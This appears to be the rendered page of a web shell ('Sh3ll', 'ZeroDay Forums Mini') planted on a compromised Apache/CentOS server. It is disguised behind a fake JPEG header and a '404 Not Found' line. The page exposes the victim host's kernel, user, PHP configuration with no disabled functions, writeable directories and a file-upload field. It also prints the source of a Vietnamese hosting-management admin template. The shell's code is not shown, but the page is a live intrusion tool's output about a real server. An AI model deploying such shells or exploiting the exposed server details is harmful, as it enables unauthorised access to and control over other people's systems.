����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/admin.adimi/code/management/infohosting/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/admin.adimi/code/management/infohosting/list_tpl.php
<ul class="nav nav-tabs">
    <li class="nav-item">
        <a class="nav-link <?php if($type2==0) echo 'active';?>" aria-current="page" href="?act=management&code=infohosting">Tất cả</a>
    </li>
    <li class="nav-item">
        <a class="nav-link <?php if($type2==1) echo 'active';?>" href="?act=management&code=infohosting&type2=1">Hosting Đang sử dụng</a>
    </li>
    <li class="nav-item">
        <a class="nav-link <?php if($type2==2) echo 'active';?>" href="?act=management&code=infohosting&type2=2">Hosting Sắp hết hạn</a>
    </li>
    <li class="nav-item">
        <a class="nav-link <?php if($type2==3) echo 'active';?>" href="?act=management&code=infohosting&type2=3">Hosting Đã hết hạn</a>
    </li>
</ul>

<div class="card">
    <div class="card-header">
    Danh sách Hosting (<?php echo $total;?>)

        <div class="card-tools"><a href="?act=management&code=infohosting&type=post" class="btn btn-success"><i class="far fa-plus-square"></i> Thêm mới</a></div>
    </div>
    <div class="card-body">
        <table class="table table-bordered">
            <tr><th>STT</th><th>Hosting IP</th><th>Domain</th><th>Cpanel Link</th><th>Ngày bắt đầu</th><th>Ngày hết hạn</th><th>Status</th><th>#</th></tr>
            <?php
            if(!empty($txt_list)) {
                echo $txt_list;
            }else{
                echo '<tr><td colspan="8">Không tìm thấy.</td></tr>';
            }
            ?>
        </table>

    </div>
    <div class="card-footer clearfix">
        <ul class="pagination pagination-sm m-0 float-right">
            <?php echo $nav;?>
        </ul>
    </div>
</div>

ZeroDay Forums Mini